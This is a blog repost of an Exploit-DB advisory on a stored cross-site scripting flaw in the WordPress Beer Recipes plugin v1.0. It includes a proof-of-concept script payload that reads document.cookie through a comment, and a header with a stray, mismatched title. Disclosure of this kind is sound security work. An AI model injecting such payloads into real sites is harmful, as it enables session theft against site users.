Skip to content
AppUnix

Exploit for wordpress: WordPress Beer Recipes Plugin v.1.0 XSS

28/06/2011 by OwnServer

# Exploit Title: WordPress - Beer Recipes v.1.0 XSS

# Google Dork: -
# Date: June / 25 / 2011
# Author: TheUzuki.'
# Software Link: http://opensourcebrew.org/beer-recipes-plugin/
# Version: v.1.0
# Tested on: Windows 7
# CVE : -
####################################################################
# SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities
# download: http://opensourcebrew.org/beer-recipes-plugin/
#
# Author: TheUzuki.' from HF
# mail: uzuki[@]live[dot]de
#
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
#
# Notes: You need to be User at the WordPress Board
#
####################################################################
--Description of WordPress Plugin--
Creates a custom post type for easily entering beer recipes into WordPress
--Exploit--
By Commenting a Beer Recip, with a javascript, the Javascripts,gets executed directly.
This causes a XSS.
--PoC--

<script>alert(document.cookie)</script>

 

Fonte: http://www.exploit-db.com/exploits/17453

Post navigation

Previous Post:

Stable kernel 2.6.34.10

Next Post:

Exploit for WordPress core 3.1.3 Persistent SELF XSS Vulnerability

Pesquisa

Categorias

  • Blog
  • cPanel
  • How Tos
  • Linux
  • Mac Os
  • MySQL
  • Wordpress

#Apoiadores

Patrocinador

Registre-se e ganhe $25



© 2022 AppUnix | Built using WordPress and MxGuard